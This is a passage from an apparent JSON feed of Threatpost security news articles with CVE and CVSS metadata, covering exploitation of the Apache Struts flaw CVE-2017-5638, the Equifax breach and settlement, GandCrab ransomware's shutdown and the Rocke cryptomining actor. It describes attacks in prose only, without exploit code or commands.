the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache. An attacker can trivially exploit the vulnerability to gain remote code execution by sending an HTTP request that contains a crafted Content-Type value. 
The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear as to why there\u2019s been a dropoff in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. 
The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say. It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 
million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. 
Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, when it first disclosed the data breach in a statement saying that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to patch the vulnerability, it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. 
In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayer identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. 
<https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach \u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye 
company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought. The company had said several weeks ago that up to 100,000 Canadians may have been affected; upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says it\u2019s still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle of discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. 
CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48-hour period, Smith said.\n\nThat was never done and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer-facing website for the breach was hosted on a separate domain from the main Equifax website, the confusion that this spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said. \u201cTalk about ham-handed responses. This is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. 
When told the company\u2019s original site couldn\u2019t handle the traffic it received, Murphy was befuddled.\n\n\u201cWhy wouldn\u2019t your website be able to handle this kind of traffic?\u201d Murphy asked. \u201cIt just doesn\u2019t make sense, a company your size and with your knowledge, doesn\u2019t understand how to handle traffic for over 100 million people, don\u2019t you use an Elastic cloud computing service that would\u2019ve accounted for this?\u201d\n\nSmith said the sheer amount of traffic Equifax\u2019s site received in wake of the breach made hosting a site on its domain impossible.\n\n\u201cThe environment the micro site is in is a cloud environment that\u2019s very, very scalable,\u201d Smith said. \u201cOur traditional environment could not handle 400 million consumer visits for three weeks.\u201d\n\nMurphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it\u2019s possible Equifax\u2019s internal scanning system could potentially miss another vulnerability.\n\n\u201cIf the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?\u201d Murphy asked.\n\nSmith skirted the question and instead discussed the difficulties associated with patching.\n\n\u201cPatching can take a variety of time\u2026 it can take days or up to a week or more,\u201d Smith said, adding that he wasn\u2019t aware of the particular Struts vulnerability at the time.\n\nAt the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California\u2019s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.\n\n\u201cI want to know when they did it, when they took care of [the patch],\u201d Eshoo said.\n\n\u201cThey took care of it in July because we never found it,\u201d Smith said. 
\u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. 
This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary.png>)\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). 
This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied to privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? 
Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. 
\u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. 
\u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. 
So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:46:10", "description": "The GandCrab ransomware group is shutting down, according to posts on the Dark Web.\n\nResearchers David Montenegro and Damian [spotted the announcements](<https://twitter.com/Damian1338B/status/1134723204566700033>) over the weekend.\n\n> Start of GandCrab Ransomware : 28-1-2018 .. \ud83e\udd80\ud83e\udd80\ud83e\udd80 \nClose of GandCrab Ransomware : 1-6-2019 .. 
\u2620\ufe0f\u2620\ufe0f\u2620\ufe0f[@Raj_Samani](<https://twitter.com/Raj_Samani?ref_src=twsrc%5Etfw>) [@ValthekOn](<https://twitter.com/ValthekOn?ref_src=twsrc%5Etfw>) [@John_Fokker](<https://twitter.com/John_Fokker?ref_src=twsrc%5Etfw>) [@hasherezade](<https://twitter.com/hasherezade?ref_src=twsrc%5Etfw>) [@VK_Intel](<https://twitter.com/VK_Intel?ref_src=twsrc%5Etfw>) [@James_inthe_box](<https://twitter.com/James_inthe_box?ref_src=twsrc%5Etfw>) [@luca_nagy_](<https://twitter.com/luca_nagy_?ref_src=twsrc%5Etfw>) [@Bitdefender](<https://twitter.com/Bitdefender?ref_src=twsrc%5Etfw>) [@Europol](<https://twitter.com/Europol?ref_src=twsrc%5Etfw>) [@campuscodi](<https://twitter.com/campuscodi?ref_src=twsrc%5Etfw>) [@tamas_boczan](<https://twitter.com/tamas_boczan?ref_src=twsrc%5Etfw>) [@JayTHL](<https://twitter.com/JayTHL?ref_src=twsrc%5Etfw>) [@demonslay335](<https://twitter.com/demonslay335?ref_src=twsrc%5Etfw>) [@struppigel](<https://twitter.com/struppigel?ref_src=twsrc%5Etfw>) [pic.twitter.com/kkrhKUunDX](<https://t.co/kkrhKUunDX>)\n> \n> \u2014 CryptoInsane (@CryptoInsane) [June 1, 2019](<https://twitter.com/CryptoInsane/status/1134727041826377729?ref_src=twsrc%5Etfw>)\n\nNoting that \u201call good things come to an end,\u201d GandCrab\u2019s operators in a posting on the exploit[.]in underground market claim the malware has raked in nearly $2 billion since the ransomware launched in January of last year. That encompasses ransomware-as-a-service (RaaS) earnings as well as $150 million for the operators themselves. 
They said they were averaging $2.5 million per week.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nYet, despite all of this success \u2013 and perhaps due to more [GandCrab decryptors](<https://www.nomoreransom.org/en/decryption-tools.html>) popping up to [help businesses combat infections](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) \u2013 the group said that it is suspending their servers, ads and infrastructure.\n\nThe operators also warned, \u201cVictims, if you buy, now. Then your data no one will recover. Keys will be deleted.\u201d\n\nMichael Gillespie, Emsisoft researcher and creator of the ID Ransomware service, told Threatpost: \u201cThe number of GrandCrab submissions to ID Ransomware has been trending downwards for some time. I think they\u2019re doing like the TeslaCrypt devs; getting out while the going is good and sailing away on their yachts. Unfortunately, no-one will ever be able to decrypt unless the criminals release the keys for the more recent variants.\u201d\n\n## GandCrab: A Swiftly Moving Malware\n\nGandCrab is a fairly standard ransomware in that it scans infected Windows systems and any network shares for files to encrypt. It\u2019s recognizable by the \u201c.gdcb\u201d extension that it appends to encrypted files.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/03101107/GrandCrab-Closing-Message.png>)\n\nYet in the 16 months since its debut, it has become [one of the most prolific ransomware strains](<https://threatpost.com/banking-trojans-top-threat-email/141814/>) out there, as GandCrab\u2019s operators have also continued to evolve its code (there are five versions) and [infection vectors](<https://threatpost.com/gandcrabs-rotten-eggs-hatch-ransomware-in-south-korea/136689/>).\n\nThose operators specialized in the RaaS model, according to researchers, and partnering with botnet operators and other affiliate cybercriminals \u2013 which helps account for its widespread virulence. 
It spreads in various ways, including via spam emails, exploit kits, targeted social engineering efforts, fake software downloads and malicious websites; and it was recently spotted as the final payload for [a series of attacks](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) that exploit the recently patched, critical Oracle WebLogic bug, CVE-2019-2725.\n\nSome attackers have customized the code as well; recently for example Bromium [identified](<https://www.bromium.com/gandcrab-ransomware-code-hiding-in-image>) a new PowerShell technique being used to spread GandCrab that uses Excel documents and an image of Super Mario to infect machines. It only attacked Windows computers in Italy, and was coded to not execute if the infection landed in a different geography.\n\n\u201cAnalysis showed PowerShell code launching from malicious Excel spreadsheets, which are freshly rewrapped to avoid detection by signature-based security tools,\u201d Bromium explained in its blog on the campaign, in May. \u201cThe script is then used to download a picture of Super Mario which contains more PowerShell code that ultimately downloads GandCrab ransomware, encrypting files and network assets. By hiding the ransomware within images, it makes it nearly impossible for perimeter detection to work out if there is something malicious within the code.\u201d\n\nDespite their successful 16-month run, GandCrab\u2019s operators are ready to retire, they said.\n\n\u201cWe successfully cashed this money and legalized it in various spheres of white business,\u201d they posted. \u201cWe are leaving for a well-deserved retirement. We have proven that by doing evil deeds, retribution does not come. 
We proved that in a year, you can earn money for a lifetime.\u201d\n", "cvss3": {}, "published": "2019-06-03T14:18:01", "type": "threatpost", "title": "GandCrab Ransomware Shutters Its Operations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-06-03T14:18:01", "id": "THREATPOST:3E82813FD33FCC5937E06B9D667A547A", "href": "https://threatpost.com/gandcrab-ransomware-shutters/145267/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:51:17", "description": "Researchers are warning of a Chinese-language threat actor leveraging a wide array of Git repositories to infect vulnerable systems with Monero-based cryptomining malware.\n\nResearchers at Cisco Talos, who discovered the threat actor they call \u201cRocke\u201d, said they have been tracking the adversary since April as it continues to plant various Monero miners on vulnerable systems. Rocke\u2019s hallmark is the enlisting of toolkits that leverage Git repositories, HTTP File Servers (HFS) and a myriad of different payloads. The name Rocke was derived from the group\u2019s Monero wallet that includes \u201crocke@live.cn\u201d.\n\n\u201cRocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines,\u201d the research team said in a [post](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) Thursday. \u201cIt is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware.\u201d\n\nCisco Talos said it first spotted the threat actor in April 2018 when its malware was found in both Western and Chinese honeypots attempting to exploit an Apache Struts vulnerability.\n\nA user named \u201cc-000\u201d first downloaded several files to the researchers\u2019 Struts 2 honeypot from the Chinese repository site (Gitee.com), researchers said. 
At the same time another user named \u201cc-18\u201d pulled down files in similar activity from a GitLab.com repository page. The repositories on both Gitee and GitLab were identical, leading researchers to determine they were the same actor. The repositories also contained similar files such as an array of ELF executables, shell scripts, and text files. Each executed a variety of Monero-based cryptocurrency miners.\n\n\u201cAfter months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors,\u201d wrote David Liebenberg, senior threat analyst, who authored the Cisco Talos report.\n\nResearchers said they found the same threat actor exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting a critical Java deserialization vulnerability in the Adobe ColdFusion platform (CVE-2017-3066).\n\n## Recent Campaigns\n\nAs recently as late July, researchers said they discovered another similar campaign on their Struts 2 honeypot. The honeypot received a wget request (a command for downloading files from the internet) for a file called \u201c0720.bin.\u201d When researchers did some digging and visited the host this file was located on, they discovered that it contained a slew of additional files, including shell scripts and cryptominers.\n\nThose files included an Executable and Linkable (ELF) file called \u201c3307.bin,\u201d a shell script called \u201ca7\u201d that kills a variety of processes related to other cryptomining malware, as well as shell scripts \u201clowerv2.sh\u201d and \u201crootv2.sh,\u201d which attempt to download and execute cryptomining malware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/30151343/talos.png>)\n\nThey also found a file called \u201cconfig.json,\u201d which is a mining config file for open-source Monero miner XMRig. 
